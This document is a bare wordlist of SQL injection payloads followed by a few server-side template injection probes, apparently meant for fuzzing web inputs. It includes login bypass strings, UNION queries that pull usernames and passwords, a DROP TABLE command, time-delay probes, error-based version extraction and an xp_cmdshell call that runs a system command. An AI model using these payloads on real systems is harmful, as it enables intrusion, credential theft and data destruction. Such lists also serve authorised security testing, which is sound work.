'
"
' OR '1'='1
" OR "1"="1
' OR '1'='1'--
" OR "1"="1"--
' OR '1'='1'/*
1' OR '1'='1
1" OR "1"="1
' OR 1=1--
" OR 1=1--
' OR 1=1#
" OR 1=1#
') OR ('1'='1
") OR ("1"="1
')) OR (('1'='1
1 OR 1=1
1' OR '1'='1' --
admin'--
admin' #
admin'/*
' OR ''='
" OR ""="
'='
"="
1'1
1"1
'||'1
"||"1
'+'1
"+1+"
' AND '1'='1
" AND "1"="1
' AND 1=1--
" AND 1=1--
ORDER BY 1--
ORDER BY 10--
ORDER BY 100--
UNION SELECT NULL--
UNION SELECT NULL,NULL--
UNION SELECT NULL,NULL,NULL--
' UNION SELECT 1,2,3--
" UNION SELECT 1,2,3--
1' UNION SELECT username,password FROM users--
'; DROP TABLE users--
'; SELECT SLEEP(5)--
'; WAITFOR DELAY '0:0:5'--
' AND SLEEP(5)--
" AND SLEEP(5)--
1' AND SLEEP(5)--
' OR SLEEP(5)--
'; SELECT pg_sleep(5)--
' || pg_sleep(5)--
'||pg_sleep(5)--
1' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--
' AND BENCHMARK(10000000,SHA1('test'))--
'; EXEC xp_cmdshell('whoami')--
' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT version())))--
' AND UPDATEXML(1,CONCAT(0x7e,(SELECT version())),1)--
' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT version()),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.tables GROUP BY x)a)--
${7*7}
{{7*7}}
<%= 7*7 %>
#{7*7}
*|7*7|*
